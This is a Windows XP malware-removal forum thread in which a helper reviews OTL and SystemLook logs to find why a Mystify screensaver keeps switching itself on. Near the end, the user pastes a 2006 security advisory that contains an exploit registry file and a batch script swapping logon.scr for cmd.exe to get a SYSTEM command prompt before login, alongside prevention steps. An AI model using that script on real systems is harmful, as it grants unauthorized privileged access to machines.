Solved PC Performance Analysis and Stability Malware / registry repairs?

[LaptopWrecked]

Here is the OTL log

All processes killed
========== OTL ==========
========== SERVICES/DRIVERS ==========
========== REGISTRY ==========
========== FILES ==========
C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\RegistryGenius_Setup.exe moved successfully.
C:\Program Files\Common Files\Wise Installation Wizard\WIS6A615007721D4063B226EA41EB6604B9_9_0_3_3.MSI moved successfully.
========== COMMANDS ==========

[EMPTYTEMP]

User: Administrator
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: All Users

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: fix
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: fix.ASUS-P1-W3V
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: fix.ASUS-P1-W3V.000
->Temp folder emptied: 856938 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 63362207 bytes
->Flash cache emptied: 853 bytes

User: Guest
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: LocalService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33223 bytes

User: xxxxxxxxxxx

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\dllcache .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 483 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 61.00 mb


[EMPTYFLASH]

User: Administrator
->Flash cache emptied: 0 bytes

User: All Users

User: Default User
->Flash cache emptied: 0 bytes

User: fix
->Flash cache emptied: 0 bytes

User: fix.ASUS-P1-W3V
->Flash cache emptied: 0 bytes

User: fix.ASUS-P1-W3V.000
->Flash cache emptied: 0 bytes

User: Guest
->Flash cache emptied: 0 bytes

User: LocalService

User: NetworkService

User: xxxxxxxxxx

Total Flash Files Cleaned = 0.00 mb


OTL by OldTimer - Version 3.2.24.0 log created on 06182011_165037

Files\Folders moved on Reboot...

Registry entries deleted on Reboot...

 

[LaptopWrecked]

One remaining problem?

Whatever program is making the "mystify" screensaver launch is still active, I think. Is there any specific way to check that or to know how dangerous it may be?

Should I run the OTL cleanup?

 

[Broni]

Hold on with the cleanup...

Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2
64-bit users go HERE

• Double-click SystemLook.exe to run it.
• Vista\Win 7 users:: Right click on SystemLook.exe, click Run As Administrator
• Copy the content of the following box into the main textfield:
  

  :filefind
  *.scr
  :reg
  HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel
  HKEY_USERS\.DEFAULT\Control Panel\Desktop

• Click the Look button to start the scan.
• When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.

Note: The log can also be found on your Desktop entitled SystemLook.txt

 

[LaptopWrecked]

SystemLook 04.09.10 by jpshortstuff
Log created at 17:57 on 18/06/2011 by fix
Administrator - Elevation successful

========== filefind ==========

Searching for "*.scr"
C:\Documents and Settings\All Users\Documents\rkill.scr --a---- 1007108 bytes [05:18 03/06/2011] [05:28 03/06/2011] F206C61003B5F9E32A870CA9C6505963
C:\Documents and Settings\fix.ASUS-P1-W3V\My Documents\Downloads\dds.scr -r----- 607222 bytes [05:48 10/06/2011] [05:48 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\dds.scr -r----- 607222 bytes [17:40 10/06/2011] [17:40 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\rkill.scr --a---- 1007120 bytes [06:32 12/06/2011] [06:32 12/06/2011] 62B8E10334799A27218FBE57708A9FC1
C:\Documents and Settings\fix.ASUS-P1-W3V.000\My Documents\Downloads\dds.scr --a---- 607222 bytes [17:33 10/06/2011] [17:33 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
C:\Program Files\SDHelper (Spybot - Search & Destroy)\STQSEYVRYIKRNYNY.scr -rahs-- 1562960 bytes [08:31 16/06/2011] [21:25 15/09/2008] 35F73F1936BDE91F1B6995510A61E7A8
C:\Program Files\Spybot - Search & Destroy\GTLCSEUDCSDJNF.scr -rahs-- 1740632 bytes [08:49 16/06/2011] [22:31 26/01/2009] 7C616AD7AE8F75278A069641ECFCDC06
C:\Program Files\Spybot - Search & Destroy\KFRRJMFAONNJVHGPGV.scr --a---- 4393096 bytes [08:49 16/06/2011] [06:04 31/05/2005] 09CA174A605B480318731E691DC98539
C:\Program Files\Spybot - Search & Destroy\YVGXLHHZOXWJ.scr -rahs-- 2144088 bytes [08:49 16/06/2011] [22:31 26/01/2009] 896A1DB9A972AD2339C2E8569EC926D1
C:\Program Files\TeaTimer (Spybot - Search & Destroy)\XXIXEEZJBUKYWHXIH.scr -rahs-- 2260480 bytes [08:31 16/06/2011] [23:07 05/03/2009] 390679F7A217A5E73D756276C40AE887
C:\WINDOWS\$NtServicePackUninstall$\logon.scr -----c- 220672 bytes [21:24 09/11/2008] [12:00 04/08/2004] 43FCEEF75FD6208925DDD4FFF8C36723
C:\WINDOWS\$NtServicePackUninstall$\scrnsave.scr -----c- 9216 bytes [21:24 09/11/2008] [12:00 04/08/2004] BDFA8CF643506ECFAA89AA60250C4C08
C:\WINDOWS\$NtServicePackUninstall$\ss3dfo.scr -----c- 704512 bytes [21:24 09/11/2008] [12:00 04/08/2004] F7A268DC8F94B4404ADF6C648BF54289
C:\WINDOWS\$NtServicePackUninstall$\ssbezier.scr -----c- 19968 bytes [21:24 09/11/2008] [12:00 04/08/2004] 7309359BBE66C6CE4CD733B8F8F02953
C:\WINDOWS\$NtServicePackUninstall$\ssflwbox.scr -----c- 393216 bytes [21:24 09/11/2008] [12:00 04/08/2004] 72A5555729E786566823E6BB4ACD6FBD
C:\WINDOWS\$NtServicePackUninstall$\ssmarque.scr -----c- 20992 bytes [21:24 09/11/2008] [12:00 04/08/2004] 16869817BEE71AED4003B2C380B1FD44
C:\WINDOWS\$NtServicePackUninstall$\ssmypics.scr -----c- 47104 bytes [21:24 09/11/2008] [12:00 04/08/2004] 931B08F87AC66DA54FD5A0D8F73F5F34
C:\WINDOWS\$NtServicePackUninstall$\ssmyst.scr -----c- 18944 bytes [21:24 09/11/2008] [12:00 04/08/2004] 815A6CE9069C7D42E169657923C50756
C:\WINDOWS\$NtServicePackUninstall$\sspipes.scr -----c- 610304 bytes [21:24 09/11/2008] [12:00 04/08/2004] F6D28802AA6423D84F918AB202FA0584
C:\WINDOWS\$NtServicePackUninstall$\ssstars.scr -----c- 14336 bytes [21:24 09/11/2008] [12:00 04/08/2004] B7D61243AB22F27D059030499EC791F5
C:\WINDOWS\$NtServicePackUninstall$\sstext3d.scr -----c- 679936 bytes [21:24 09/11/2008] [12:00 04/08/2004] 5AB7A4EBBEA9B44C112FE99BC099837D
C:\WINDOWS\ServicePackFiles\i386\logon.scr ------- 220672 bytes [00:12 14/04/2008] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
C:\WINDOWS\ServicePackFiles\i386\scrnsave.scr ------- 9216 bytes [00:12 14/04/2008] [00:12 14/04/2008] 7BA27A296EE84861BFE97B96874CCAA6
C:\WINDOWS\ServicePackFiles\i386\ss3dfo.scr ------- 704512 bytes [00:12 14/04/2008] [00:12 14/04/2008] 2C0033EA0853E27C8E30603642D9FA84
C:\WINDOWS\ServicePackFiles\i386\ssbezier.scr ------- 19968 bytes [00:12 14/04/2008] [00:12 14/04/2008] 07EBBE91C46376AB0D38D61A629185B0
C:\WINDOWS\ServicePackFiles\i386\ssflwbox.scr ------- 393216 bytes [00:12 14/04/2008] [00:12 14/04/2008] E27992B5BE536EDE2D50A253A880C852
C:\WINDOWS\ServicePackFiles\i386\ssmarque.scr ------- 20992 bytes [00:12 14/04/2008] [00:12 14/04/2008] 6700DBF0268936EDF0922FE469DD3138
C:\WINDOWS\ServicePackFiles\i386\ssmypics.scr ------- 47104 bytes [00:12 14/04/2008] [00:12 14/04/2008] 5E453CB99DF0838226DEFC05F3484CDF
C:\WINDOWS\ServicePackFiles\i386\ssmyst.scr ------- 18944 bytes [00:12 14/04/2008] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA
C:\WINDOWS\ServicePackFiles\i386\sspipes.scr ------- 610304 bytes [00:12 14/04/2008] [00:12 14/04/2008] D5B0ED8ECA34F8480E555F47269AB0BA
C:\WINDOWS\ServicePackFiles\i386\ssstars.scr ------- 14336 bytes [00:12 14/04/2008] [00:12 14/04/2008] 86984E591641191236033D2A4D80ED56
C:\WINDOWS\ServicePackFiles\i386\sstext3d.scr ------- 679936 bytes [00:12 14/04/2008] [00:12 14/04/2008] D66709F79D595DD378C995C3347349C1
C:\WINDOWS\system32\7E7 Screensaver.scr --a---- 7732880 bytes [07:13 11/09/2006] [07:13 11/09/2006] C9B1EF9ED9E404EBAD2E539A2F7E979E
C:\WINDOWS\system32\Boeing 747-8.scr --a---- 2947372 bytes [19:26 16/02/2006] [19:26 16/02/2006] 2AF2CC23586C2DA2B4D6181A969064F0
C:\WINDOWS\system32\logon.scr --a---- 220672 bytes [12:00 04/08/2004] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
C:\WINDOWS\system32\scrnsave.scr --a---- 9216 bytes [12:00 04/08/2004] [00:12 14/04/2008] 7BA27A296EE84861BFE97B96874CCAA6
C:\WINDOWS\system32\ss3dfo.scr --a---- 704512 bytes [12:00 04/08/2004] [00:12 14/04/2008] 2C0033EA0853E27C8E30603642D9FA84
C:\WINDOWS\system32\ssbezier.scr --a---- 19968 bytes [12:00 04/08/2004] [00:12 14/04/2008] 07EBBE91C46376AB0D38D61A629185B0
C:\WINDOWS\system32\ssflwbox.scr --a---- 393216 bytes [12:00 04/08/2004] [00:12 14/04/2008] E27992B5BE536EDE2D50A253A880C852
C:\WINDOWS\system32\ssmarque.scr --a---- 20992 bytes [12:00 04/08/2004] [00:12 14/04/2008] 6700DBF0268936EDF0922FE469DD3138
C:\WINDOWS\system32\ssmypics.scr --a---- 47104 bytes [12:00 04/08/2004] [00:12 14/04/2008] 5E453CB99DF0838226DEFC05F3484CDF
C:\WINDOWS\system32\ssmyst.scr --a---- 18944 bytes [12:00 04/08/2004] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA
C:\WINDOWS\system32\sspipes.scr --a---- 610304 bytes [12:00 04/08/2004] [00:12 14/04/2008] D5B0ED8ECA34F8480E555F47269AB0BA
C:\WINDOWS\system32\ssstars.scr --a---- 14336 bytes [12:00 04/08/2004] [00:12 14/04/2008] 86984E591641191236033D2A4D80ED56
C:\WINDOWS\system32\sstext3d.scr --a---- 679936 bytes [12:00 04/08/2004] [00:12 14/04/2008] D66709F79D595DD378C995C3347349C1

========== reg ==========

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel]
(Unable to open key - key not found)

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

 

[Broni]

Give me some more details about that "mystify" screensaver.
When exactly can you see it, why do you call it "mystify" and whatever else you can give me...

 

[LaptopWrecked]

I call it "mystify" because that's it's name in the screensaver choices under display settings in control panel.

Well, I have a Spybot dialogue box popping up every once in a while telling me a warning that the system is trying to change a registry value with file names that look like they belong to the "mystify" screensaver-- ( it is the one that is a bunch of triangles that bounce around on a black background). I have NEVER chosen to run that screensaver on my computer. If I fail to stop it, It sets itself to activate at 1 minute of inactivity. Sometimes it doesn't show up, sometimes it does.

Anyway, in the Spybot dialogue box I can choose to allow or deny the registry change, so every time it's popped up I have denied it. But I think once it ran even though I denied it in the spybot box.

Are any of these relevant files?

C:\WINDOWS\system32\ssmyst.scr --a---- 18944 bytes [12:00 04/08/2004] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA

C:\WINDOWS\ServicePackFiles\i386\ssmyst.scr ------- 18944 bytes [00:12 14/04/2008] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA

C:\WINDOWS\$NtServicePackUninstall$\ssmyst.scr -----c- 18944 bytes [21:24 09/11/2008] [12:00 04/08/2004] 815A6CE9069C7D42E169657923C50756

 

[Broni]

It looks like that's the "offending" file, but....it's a legit Microsoft screensaver, so I'm not sure why you're actually complaining about it.

 

[LaptopWrecked]

It looks like that's the "offending" file, but....it's a legit Microsoft screensaver, so I'm not sure why you're actually complaining about it.

I just don't know why it has launched itself at a 1 minute start time when I have not selected any screensaver to run at all.

That is not normal, correct?

 

[Broni]

Double check screensaver settings. Something must be allowing to run.

Then continue with OTL cleanup and other steps.

 

[LaptopWrecked]

Upon computer start up/ loading windows my Spybot program caught it again.

Here is the text from the Spybot dialogue window:

Registry change alert
Category: Desktop Settings
Change: Value Added
Entry: scrnsave.exe
New Data: C:WINDOWS\system32\ssmyst.scr

I then deny the change. I also looked for ssmyst.scr in the path shown above, but I don't see it in the tree.

 

[Broni]

Why are you denying it?
It's a legit Windows file.

 

[LaptopWrecked]

i just don't understand why it's launching itself without my asking for it to run.

 

[Broni]

Double check screensaver settings.

 

[LaptopWrecked]

I have "none" selected in control panel.

When this thing launches it runs the "mystify" screensaver at a 1 minute time selection. Without me asking for it.

 

[Broni]

Launch Notepad and paste the following four lines. (Note: The second line must be blank.)

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop]
"ScreenSaveActive"="0"

Save the file to your desktop with the name Disable ScreenSaver.reg.

Right click on the above file, click "Merge".

Restart computer.

Re-run System Look with the following code:

:reg
HKEY_USERS\.DEFAULT\Control Panel\Desktop

Post the log.

 

[LaptopWrecked]

SystemLook 04.09.10 by jpshortstuff
Log created at 15:41 on 19/06/2011 by fix
Administrator - Elevation successful

========== reg ==========

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ActiveWndTrkTimeout"= 0x0000000000 (0)
"AutoEndTasks"="0"
"CaretWidth"= 0x0000000001 (1)
"CoolSwitch"="1"
"CoolSwitchColumns"="7"
"CoolSwitchRows"="3"
"CursorBlinkRate"="530"
"DragFullWindows"="2"
"DragHeight"="4"
"DragWidth"="4"
"FontSmoothing"="2"
"FontSmoothingOrientation"= 0x0000000001 (1)
"FontSmoothingType"= 0x0000000001 (1)
"ForegroundFlashCount"= 0x0000000003 (3)
"ForegroundLockTimeout"= 0x0000030d40 (200000)
"GridGranularity"="0"
"HungAppTimeout"="5000"
"LowPowerActive"="0"
"LowPowerTimeOut"="0"
"MenuShowDelay"="400"
"PaintDesktopVersion"= 0x0000000000 (0)
"Pattern"="(None)"
"PowerOffActive"="0"
"PowerOffTimeOut"="0"
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="logon.scr"
"TileWallpaper"="0"
"UserPreferencesMask"=9e 3e 03 80 (REG_BINARY)
"WaitToKillAppTimeout"="20000"
"Wallpaper"="(None)"
"WallpaperStyle"="2"
"OriginalWallpaper"=""
"WheelScrollLines"="3"

[HKEY_USERS\.DEFAULT\Control Panel\Desktop\WindowMetrics]


-= EOF =-




Have to go to work now. Thanks for all the assistance. Back about 9pm pacific time.

 

[LaptopWrecked]

Found Screensaver Vulnerability Post on another site

Does this look like what may be going on with my system?


-- Advisory Name --

Default Screen Saver Vulnerability in Microsoft Windows

-- Author --

Susam Pal

-- Vulnerable Systems --

Windows XP, Windows 2003 Server

-- Vulnerability Description --

This vulnerability has been tested on Windows XP and Windows 2003 Server. The screen saver in these systems is allowed to run even when a user hasn't logged in. To verify this one has to start windows and wait for the default screen saver to appear without logging in. The screen saver should appear after 10 minutes because that is the default value of screen saver time-out.

Since no user logs in, this screen saver runs as a system process. The registry entries for this screen saver running as a system process can be found in the registry-key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop". The following are the default values.

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

"ScreenSaverIsSecure"="0"

"ScreenSaveTimeOut"="600"

"ScreenSaveActive"="1"

"SCRNSAVE.EXE"="logon.scr"

It can be seen that the default time-out value is 600 seconds or 10 minutes.

An attacker can replace the default screen saver (logon.scr) with the command prompt (cmd.exe) and reduce the time-out period in a system by using a trojan or some other means. Later, the attacker can boot the system and wait for the screen saver to appear which is now the command prompt. Since the command prompt now runs as a system process, the attacker can perform critical operations including malicious ones. He may even execute "explorer.exe" to bring up the Windows GUI along with the desktop, start button, etc.

-- Exploit Reg File --

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]

"ScreenSaverIsSecure"="0"

"ScreenSaveTimeOut"="60"

"ScreenSaveActive"="1"

"SCRNSAVE.EXE"="logon.scr"

-- Exploit Script --

@echo off

rem ------------------------------------------------------------------------
---

rem FileName: DSSExploit.bat

rem Description: This script replaces the default windows screensaver

rem with command prompt and configures the registry for

rem attack

rem Author: Susam Pal

rem Date: 19th May, 2006

rem ------------------------------------------------------------------------
---

rem kill logon.scr if its running

tasklist | find /i "logon.scr"

if %errorlevel% == 1 goto replace

taskkill /f /im "logon.scr"

:replace

rem replace

rename %SystemRoot%\System32\logon.scr logon.scr.bak

copy %ComSpec% %SystemRoot%\System32\logon.scr

rem update the registry keys for default screen saver

set DSSKEY="HKEY_USERS\.DEFAULT\Control Panel\Desktop"

reg add %DSSKEY% /v ScreenSaveActive /t REG_SZ /f /d 1

reg add %DSSKEY% /v ScreenSaverIsSecure /t REG_SZ /f /d 0

reg add %DSSKEY% /v ScreenSaveTimeOut /t REG_SZ /f /d 60

reg add %DSSKEY% /v SCRNSAVE.EXE /t REG_SZ /f /d logon.scr

-- Prevention --

One of the following preventive measures should be taken.

1. The users of the system should not run any program, script or software obtained from unreliable source as an administrator or any user which has the permission to modify the Windows Registry.

2. Disable screen saver by executing the following command.

reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /f /d 0

Deny everyone all permissions on the registry key, "My Computer\HKEY_USERS\.DEFAULT\Control Panel\Desktop". This will prevent any malicious program, script or software from modifying the default screen saver settings. This can be done by the following steps.

a. Run "regedit.exe".

b. Locate the key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop".

c. Right click on the key and select "Permissions".

d. Press "Add" button.

e. Press "Locations" button.

f. If a login window appears, click "Cancel" button.

g. Select the local computer and press "Ok" button.

h. Enter "Everyone" in the text-area for object names and press "Ok" button.

8. Deny "Full Control" permission for "Everyone" and press "Ok" button.

3. Microsoft should release a patch which prevents the screen saver from running before a user logs in with proper authentication.

-- Disclaimer --

The information, codes and exploits in this advisory should be used for research, experimentation, bug-fixes and patch-releases only. The author shall not be liable in any event of any damages, incidental or consequential, in connection with, or arising out of this advisory.

-- Contact Information --

For more information, please contact:-

Susam Pal

Infosys Technologies Ltd.

Survey No. 210, Manikonda Village

Lingampally, Rangareddy District

Hyderabad, PIN 500019

India

Phone No.: +91-9985259521

Email: susam.pal (at) gmail (dot) com [email concealed]

http://susampal.blogspot.com/

http://securecoding.blogspot.com/

 

[Broni]

Go Start>Run, type in:
regedit
Click OK.

In Registry Editor, navigate to:
HKEY_USERS\.DEFAULT\Control Panel\Desktop
In right pane, right click on ScreenSaveActive, click Modify.
Change the value from 1 to 0 (zero).

Restart computer.
Will screensaver stay off?

 

[LaptopWrecked]

I did the edit. I will post results.

 

[Broni]

Still with me?

 

[LaptopWrecked]

Still with you.

Everything seems OK. Just odds and ends from fixing the registry like some programs that had desktop shortcuts (Excel, Word) were gone, calc.exe file disappeared from windows accessories. I guess those things are set up a certain way at windows installation and they reverted to a new install default.

Screen saver not launching any longer. All appears OK for now. Thanks for the help.

 

[Broni]

You're very welcome